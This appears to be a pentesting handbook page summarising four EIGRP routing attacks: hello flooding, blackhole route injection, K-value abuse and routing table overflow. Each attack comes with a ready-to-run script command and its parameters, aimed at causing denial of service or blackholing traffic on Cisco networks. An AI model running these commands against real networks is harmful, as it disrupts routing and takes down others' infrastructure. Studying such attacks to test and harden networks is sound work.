EIGRP Attacks

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This is a summary of the attacks exposed in https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9. Check it for further information.

Fake EIGRP Neighbors Attack

  • Objective: To overload router CPUs by flooding them with EIGRP hello packets, potentially leading to a Denial of Service (DoS) attack.

  • Tool: helloflooding.py script.

  • Execution: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet %%%

  • Parameters:

    • --interface: Specifies the network interface, e.g., eth0.

    • --as: Defines the EIGRP autonomous system number, e.g., 1.

    • --subnet: Sets the subnet location, e.g.,

EIGRP Blackhole Attack

  • Objective: To disrupt network traffic flow by injecting a false route, leading to a blackhole where the traffic is directed to a non-existent destination.

  • Tool: routeinject.py script.

  • Execution: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src --dst --prefix 32 %%%

  • Parameters:

    • --interface: Specifies the attacker’s system interface.

    • --as: Defines the EIGRP AS number.

    • --src: Sets the attacker’s IP address.

    • --dst: Sets the target subnet IP.

    • --prefix: Defines the mask of the target subnet IP.

Abusing K-Values Attack

  • Objective: To create continuous disruptions and reconnections within the EIGRP domain by injecting altered K-values, effectively resulting in a DoS attack.

  • Tool: relationshipnightmare.py script.

  • Execution: %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src %%%

  • Parameters:

    • --interface: Specifies the network interface.

    • --as: Defines the EIGRP AS number.

    • --src: Sets the IP Address of a legitimate router.

Routing Table Overflow Attack

  • Objective: To strain the router's CPU and RAM by flooding the routing table with numerous false routes.

  • Tool: routingtableoverflow.py script.

  • Execution: %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src %%%

  • Parameters:

    • --interface: Specifies the network interface.

    • --as: Defines the EIGRP AS number.

    • --src: Sets the attacker’s IP address.

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